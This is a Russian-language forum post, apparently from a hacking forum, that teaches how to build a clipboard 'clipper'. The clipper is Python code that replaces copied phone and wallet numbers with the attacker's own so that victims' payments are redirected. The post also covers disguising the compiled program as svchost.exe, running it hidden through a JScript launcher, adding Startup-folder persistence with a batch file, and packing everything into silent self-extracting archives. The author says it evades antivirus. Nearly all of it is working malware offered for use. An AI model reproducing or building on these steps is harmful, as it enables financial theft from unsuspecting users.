Клиппер - программа, которая выполняет функцию подмены кошельков в буфере обмена. Во время оплаты, клиппер подменяет скопированные юзером адреса электронных кошельков и подменяет их на ваши.
сразу напешу что для этого понадобится python 3.5 https://www.python.org/downloads/
скачиваем,устанавливаем тут нечего сложного обезательно поставте галочку чтоб питон добавили в Patch
далее выходим из системы чтоб всё сохранилось
входим обратно нажимаем win+R
прописываем туда cmd и нажимаем ок
в консоле проверяем установился ли у нас питон командой python
если у нас выдало информацию о версии питона то всё норм еслеже нет то вы не поставили галочку напротив Patch
далее пишем в консолеждём установки потом если не выдало ошибок пишемCode
pip install pyperclipпроверяем всё ли установилось командойCode
pip install pyinstallerдалее открываем сам pythonCodepip list
нажимаем файл,новый проект и вставляем мой коддалее сохраняем всё это в папку с нашим питоном и опять идём к консолеCode
import pyperclip
import time
while True:
num = pyperclip.paste()
c = 0
for i in num:
try:
int(i)
c += 1
except ValueError:
pass
if [s for s in num if s in '+']:
if int(c)==12:
pyperclip.copy("+3807********")
time.sleep(3)
if [s for s in num if s in '+']:
if int(c)==11:
pyperclip.copy("+790********")
time.sleep(3)
elif int(c)==12:
pyperclip.copy("3807********")
time.sleep(3)
elif int(c)==11:
pyperclip.copy("790********")
time.sleep(3)
в консоле заходим в папку где лежит файл.ру и пишим команду pyinstaller -F имя_файла.ру и все! (параметр -F создает один файл)
появился наш ехе файл в папке с питоном в папке dist это и есть наша основа вируса (проверьте всё ли работает должным образом)
далее создаем на рабочем столе папку называем как угодно и кидаем туда нашь ехе файл создаём текстовый документ.
открываем и вставляем туда код который будет запускать нашь ехе скрытноне забудьте переименовать нашь ехе в svchost.exe (как назовёте ехе такой и будет процес в диспечере)Code
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("svchost.exe",0);
когда вставили код нажимаем сохранить как и сохраняем с названием star2t и разширением js после сохранения у нас должен появится файл star2t.js
теперь создаём ещё один текстовый документ который будет отвечать за запуск нашего файла после перезагрузки пк
вставляем туда кодCode
[USER=98981]@Echo[/USER] off
cd C:\LocalStorage\win32\drivers
star2t.js
C:\LocalStorage\win32\drivers
star2t.js это путь куда я буду распаковывать файлы вируса у вас он может быть другой
теперь сохраняем как нашь текстовик с названием start и расширением .bat после сохранения должен получится файл start.bat
теперь выделяем файлы svchost.exe и star2t.js и создаём sfx арзив с путём распаковки C:\LocalStorage\win32\drivers
обезательно ставим галочки на пунктах скрыть всё и перезапись без подтверждения
всё в графу инсталл ничего не вписываем
далее выделяем файл start.bat и тоже создаём sfx архив в путь уже прописываем
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
и тоже ставим галочки на протим скрыть всё и перезапись без подтвердждения но уже прописываем в графе инсталл start.bat чтоб после разпаковки он у нас запустился
теперь выделяем два наших sfx архива и тоже делаем из них тоже sfx архив
)путь распоковки C:\LocalStorage\win32\drivers галочки напротив спрятать всё и перезапись без последствий в инсталл порописываем запуск наших двух sfx архивов сначала с вирусом потом с батником можете ставить иконку вирус готов
фуд полностью чистый
#моя статья